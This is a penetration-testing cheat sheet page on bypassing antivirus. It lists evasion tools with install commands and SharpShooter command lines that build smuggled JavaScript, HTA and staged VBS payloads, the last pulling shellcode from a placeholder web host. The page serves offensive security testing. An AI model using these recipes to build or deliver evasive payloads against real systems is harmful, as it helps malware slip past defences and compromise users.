GitHubTwitchLinkedInTryHackMe

Bypassing AV

Veil Framework

Install on Kali:

apt install veil
/usr/share/veil/config/setup.sh --force --silent

Reference: https://github.com/Veil-Framework/Veil

Shellter

Source: https://www.shellterproject.com/download/

apt install shellter

Sharpshooter

Javascript Payload Stageless:

SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

Stageless HTA Payload:

SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

Staged VBS:

SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

Reference: https://github.com/mdsecactivebreach/SharpShooter

Donut

Source: https://github.com/TheWover/donut

Vulcan

Source: https://github.com/praetorian-code/vulcan

Scarecrow

Source: https://github.com/optiv/ScareCrow

sudo apt install golang
go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo
go build ScareCrow.go
./ScareCrow
PreviousExploitationNextSearchsploit

Last updated